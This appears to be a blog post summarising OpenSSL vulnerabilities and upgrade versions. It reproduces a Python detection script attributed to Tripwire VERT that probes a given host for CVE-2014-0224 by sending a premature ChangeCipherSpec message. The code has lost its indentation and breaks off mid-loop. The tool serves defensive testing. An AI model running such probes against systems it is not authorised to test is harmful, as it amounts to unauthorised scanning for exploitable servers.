<span style="font-family: inherit;"><span style="background-color: white;"><br /></span>
<span style="background-color: white; white-space: pre-wrap;"><i>CVE-2010-5298 (Inject data, DoS)</i></span></span><br />
<span style="background-color: white; font-family: inherit;">Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.</span><br />
<span style="font-family: inherit;"><br />
<i>CVE-2014-3470 (DoS)</i></span><br />
<span style="background-color: white; font-family: inherit;">The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.</span><br />
<span style="font-family: inherit;"><br />
<span style="background-color: white;"><b>Affected Versions:</b></span></span><br />
<span style="font-family: inherit; white-space: pre-wrap;">OpenSSL 0.9.8 DTLS</span><br />
<span style="font-family: inherit; white-space: pre-wrap;">OpenSSL 1.0.0 DTLS</span><br />
<span style="font-family: inherit; white-space: pre-wrap;">OpenSSL 1.0.1 DTLS</span><br />
<span style="font-family: inherit;"><span style="background-color: white;"><br /></span>
<span style="background-color: white;"><b>Upgrade to:</b></span></span><br />
<span style="background-color: white; font-family: inherit;">0.9.8za Version</span><br />
<span style="font-family: inherit;"><span style="background-color: white;">1.0.0m Ver</span><span style="background-color: white;">sion</span></span><br />
<span style="font-family: inherit;"><span style="background-color: white;">1.0.1h Ver</span><span style="background-color: white;">sion</span></span><br />
<span style="font-family: inherit;"><br /></span>
<span style="background-color: white; font-family: inherit; white-space: pre-wrap;">You could test your OpenSSL that has vulnerabilities.</span><br />
<div>
<br /></div>
<span style="font-family: inherit;">
<span style="background-color: white; white-space: pre-wrap;"><b>Python code (CCS inject detection, test):</b></span></span><br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #!/bin/python
import sys
import socket
import time
import struct
if len(sys.argv)<2:
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.2 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
quit()
else:
strHost = sys.argv[1]
if len(sys.argv)>2:
try:
iPort = int(sys.argv[2])
except:
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.2\nUsage: %s <host> [port=443]" % (sys.argv[0])
quit()
else:
iPort = 443
print "***CVE-2014-0224 Detection Tool v0.2***\nBrought to you by Tripwire VERT (@TripwireVERT)"
dSSL = {
"SSLv3" : "\x03\x00",
"TLSv1" : "\x03\x01",
"TLSv1.1" : "\x03\x02",
"TLSv1.2" : "\x03\x03",
}
# The following is a complete list of ciphers for the SSLv3 family up to TLSv1.2
ssl3_cipher = dict()
ssl3_cipher['\x00\x00'] = "TLS_NULL_WITH_NULL_NULL"
ssl3_cipher['\x00\x01'] = "TLS_RSA_WITH_NULL_MD5"
ssl3_cipher['\x00\x02'] = "TLS_RSA_WITH_NULL_SHA"
ssl3_cipher['\x00\x03'] = "TLS_RSA_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x04'] = "TLS_RSA_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x05'] = "TLS_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x06'] = "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x07'] = "TLS_RSA_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x08'] = "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x09'] = "TLS_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0a'] = "TLS_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0b'] = "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0c'] = "TLS_DH_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0d'] = "TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0e'] = "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0f'] = "TLS_DH_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x10'] = "TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x11'] = "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x12'] = "TLS_DHE_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x13'] = "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x14'] = "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x15'] = "TLS_DHE_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x16'] = "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x17'] = "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x18'] = "TLS_DH_anon_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x19'] = "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x1a'] = "TLS_DH_anon_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1b'] = "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x1c'] = "SSL_FORTEZZA_KEA_WITH_NULL_SHA"
ssl3_cipher['\x00\x1d'] = "SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"
ssl3_cipher['\x00\x1e'] = "SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x1E'] = "TLS_KRB5_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1F'] = "TLS_KRB5_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x20'] = "TLS_KRB5_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x21'] = "TLS_KRB5_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x22'] = "TLS_KRB5_WITH_DES_CBC_MD5"
ssl3_cipher['\x00\x23'] = "TLS_KRB5_WITH_3DES_EDE_CBC_MD5"
ssl3_cipher['\x00\x24'] = "TLS_KRB5_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x25'] = "TLS_KRB5_WITH_IDEA_CBC_MD5"
ssl3_cipher['\x00\x26'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"
ssl3_cipher['\x00\x27'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"
ssl3_cipher['\x00\x28'] = "TLS_KRB5_EXPORT_WITH_RC4_40_SHA"
ssl3_cipher['\x00\x29'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"
ssl3_cipher['\x00\x2A'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x2B'] = "TLS_KRB5_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x2C'] = "TLS_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2D'] = "TLS_DHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2E'] = "TLS_RSA_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2F'] = "TLS_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x30'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x31'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x32'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x33'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x34'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x35'] = "TLS_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x36'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x37'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x38'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x39'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3A'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3B'] = "TLS_RSA_WITH_NULL_SHA256"
ssl3_cipher['\x00\x3C'] = "TLS_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3D'] = "TLS_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x3E'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3F'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x40'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x41'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x42'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x43'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x44'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x45'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x46'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x60'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_MD5"
ssl3_cipher['\x00\x61'] = "TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5"
ssl3_cipher['\x00\x62'] = "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x63'] = "TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x64'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x65'] = "TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x66'] = "TLS_DHE_DSS_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x67'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x68'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x69'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6A'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6B'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6C'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x6D'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x80'] = "TLS_GOSTR341094_WITH_28147_CNT_IMIT"
ssl3_cipher['\x00\x81'] = "TLS_GOSTR341001_WITH_28147_CNT_IMIT"
ssl3_cipher['\x00\x82'] = "TLS_GOSTR341094_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x83'] = "TLS_GOSTR341001_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x84'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x85'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x86'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x87'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x88'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x89'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x8A'] = "TLS_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8B'] = "TLS_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x8C'] = "TLS_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x8D'] = "TLS_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x8E'] = "TLS_DHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8F'] = "TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x90'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x91'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x92'] = "TLS_RSA_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x93'] = "TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x94'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x95'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x96'] = "TLS_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x97'] = "TLS_DH_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x98'] = "TLS_DH_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x99'] = "TLS_DHE_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9A'] = "TLS_DHE_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9B'] = "TLS_DH_anon_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9C'] = "TLS_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9D'] = "TLS_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\x9E'] = "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9F'] = "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA0'] = "TLS_DH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA1'] = "TLS_DH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA2'] = "TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA3'] = "TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA4'] = "TLS_DH_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA5'] = "TLS_DH_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA6'] = "TLS_DH_anon_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA7'] = "TLS_DH_anon_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA8'] = "TLS_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA9'] = "TLS_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAA'] = "TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAB'] = "TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAC'] = "TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAD'] = "TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAE'] = "TLS_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xAF'] = "TLS_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB0'] = "TLS_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB1'] = "TLS_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB2'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB3'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB4'] = "TLS_DHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB5'] = "TLS_DHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB6'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB7'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB8'] = "TLS_RSA_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB9'] = "TLS_RSA_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xBA'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBB'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBC'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBD'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBE'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBF'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xC0'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC1'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC2'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC3'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC4'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC5'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\x00'] = "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
ssl3_cipher['\xc0\x01'] = "TLS_ECDH_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x02'] = "TLS_ECDH_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x03'] = "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x04'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x05'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x06'] = "TLS_ECDHE_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x07'] = "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x08'] = "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x09'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0a'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x0b'] = "TLS_ECDH_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x0c'] = "TLS_ECDH_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x0d'] = "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x0e'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0f'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x10'] = "TLS_ECDHE_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x11'] = "TLS_ECDHE_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x12'] = "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x13'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x14'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x15'] = "TLS_ECDH_anon_WITH_NULL_SHA"
ssl3_cipher['\xc0\x16'] = "TLS_ECDH_anon_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x17'] = "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x18'] = "TLS_ECDH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x19'] = "TLS_ECDH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x1A'] = "TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1B'] = "TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1C'] = "TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1D'] = "TLS_SRP_SHA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1E'] = "TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1F'] = "TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x20'] = "TLS_SRP_SHA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x21'] = "TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x22'] = "TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x23'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x24'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x25'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x26'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x27'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x28'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x29'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x2A'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x2B'] = "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2C'] = "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2D'] = "TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2E'] = "TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2F'] = "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x30'] = "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x31'] = "TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x32'] = "TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x33'] = "TLS_ECDHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\xC0\x34'] = "TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x35'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x36'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x37'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x38'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x39'] = "TLS_ECDHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\xC0\x3A'] = "TLS_ECDHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\xC0\x3B'] = "TLS_ECDHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\xfe\xfe'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"
ssl3_cipher['\xfe\xff'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe0'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe1'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"
def getSSLRecords(strBuf):
lstRecords = []
if len(strBuf)>=9:
sslStatus = struct.unpack('>BHHI', strBuf[0:9])
iType = (sslStatus[3] & (0xFF000000))>>24
iRecordLen = sslStatus[3] & (0x00FFFFFF)
iShakeProtocol = sslStatus[0]
iSSLLen = sslStatus[2]
#log(2,"iSSLLen == %d, len(strBuf) == %d, iRecordLen == %d",iSSLLen,len(strBuf),iRecordLen)
if (iRecordLen + 5 < iSSLLen):
#log(2,"Multiple Handshakes")
lstRecords.append((iShakeProtocol,iType))
iLoopStopper = 0
iNextOffset = iRecordLen + 9
while iNextOffset < len(strBuf):
iLoopStopper += 1
iCount = 0
while ((iNextOffset+4) > len(strBuf) and iCount < 5):
#log(2,"Need more data to fill buffer")
iCount += 1
rule.waitForData()
if len(rule.buffer) > 0:
strBuf += rule.buffer
if ((iNextOffset+4) > len(strBuf)):
#log(2,"End of message")
break
iTypeAndLen = struct.unpack(">I",strBuf[iNextOffset:iNextOffset+4])[0]
iRecordLen = iTypeAndLen & (0x00FFFFFF)
iType = (iTypeAndLen & (0xFF000000))>>24
lstRecords.append((iShakeProtocol,iType))
iNextOffset += (iRecordLen + 4)
if iLoopStopper > 8:
break
return lstRecords
elif (iRecordLen + 9 < len(strBuf)):
#log(2,"Multiple Records")
lstRecords.append((iShakeProtocol,iType))
iNextOffset = iRecordLen + 9
iLoopStopper = 0
while iNextOffset+6 < len(strBuf):
iLoopStopper += 1
iShakeProtocol = struct.unpack(">B",strBuf[iNextOffset])[0]
iRecordLen = struct.unpack(">H",strBuf[iNextOffset+3:iNextOffset+5])[0]
iType = struct.unpack(">B",strBuf[iNextOffset+5])[0]
#log(2,"iShakeProto == %d, iRecordLen == %d, iType == %d",iShakeProtocol,iRecordLen,iType)
lstRecords.append((iShakeProtocol,iType))
iNextOffset += iRecordLen + 5
if iLoopStopper > 8:
break
return lstRecords
elif (iRecordLen + 9 == len(strBuf)):
#log(2,"Single record")
sslStatus = checkSSLHeader(strBuf)
lstRecords.append((sslStatus[0],sslStatus[2]))
return lstRecords
return None
def checkSSLHeader(strBuf):
if len(strBuf)>=6:
sslStatus = struct.unpack('>BHHI', strBuf[0:9])
iType = (sslStatus[3] & (0xFF000000))>>24
iRecordLen = sslStatus[3] & (0x00FFFFFF)
iShakeProtocol = sslStatus[0]
iSSLLen = sslStatus[2]
return (iShakeProtocol,iSSLLen,iType,iRecordLen)
return None
def makeHello(strSSLVer):
r = "\x16" # Message Type 22
r += dSSL[strSSLVer]
strCiphers = ""
for c in ssl3_cipher.keys():
strCiphers += c
dLen = 43 + len(strCiphers)
r += struct.pack("!H",dLen)
h = "\x01"
strPlen = struct.pack("!L",dLen-4)
h+=strPlen[1:]
h+= dSSL[strSSLVer]
rand = struct.pack("!L", int(time.time()))
rand += "\x36\x24\x34\x16\x27\x09\x22\x07\xd7\xbe\xef\x69\xa1\xb2"
rand += "\x37\x23\x14\x96\x27\xa9\x12\x04\xe7\xce\xff\xd9\xae\xbb"
h+=rand
h+= "\x00" # No Session ID
h+=struct.pack("!H",len(strCiphers))
h+=strCiphers
h+= "\x01\x00"
return r+h
iVulnCount = 0
for strVer in ["TLSv1.2","TLSv1.1","TLSv1","SSLv3"]:
strHello = makeHello(strVer)
strLogPre = "[%s] %s:%d" % (strVer,strHost,iPort)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((strHost,iPort))
s.settimeout(5)
except:
print "Failure connecting to %s:%d." % (strHost,iPort)
quit()
s.send(strHello)
#print "Sending %s Client Hello" % (strVer)
iCount = 0
fServerHello = False
fCert = False
fKex = False
fHelloDone = False
while iCount<5:
iCount += 1
try:
recv = s.recv(2048)
except:
continue
lstRecords = getSSLRecords(recv)
#strLogMessage = "iCount = %d; lstRecords = %s" % (iCount,lstRecords)
#log(2,strLogMessage)
if lstRecords != None and len(lstRecords) > 0:
for (iShakeProtocol,iType) in lstRecords:
if iShakeProtocol == 22:
if iType == 2:
fServerHello = True
elif iType == 11:
fCert = True
elif iType == 12:
fKex = True
elif iType == 14:
fHelloDone = True
if (fServerHello and fCert):
break
else:
#log(2, "Handshake missing or invalid. Aborting.")
continue
if not (fServerHello and fCert):
print "%s Invalid handhsake." % (strLogPre)
elif len(recv)>0:
#print "Received %d bytes. (%d)" % (len(recv),ord(recv[0]))
if ord(recv[0])==22:
iCount = 0
strChangeCipherSpec = "\x14"
strChangeCipherSpec += dSSL[strVer]
strChangeCipherSpec += "\x00\x01" # Len
strChangeCipherSpec += "\x01" # Payload CCS
#print "Sending Change Cipher Spec"
s.send(strChangeCipherSpec)
fVuln = True
strLastMessage = ""
while iCount < 5:
iCount += 1
s.settimeout(0.5)
try:
recv = s.recv(2048)
except socket.timeout:
#print "Timeout waiting for CCS reply."
continue
if (len(recv)>0):
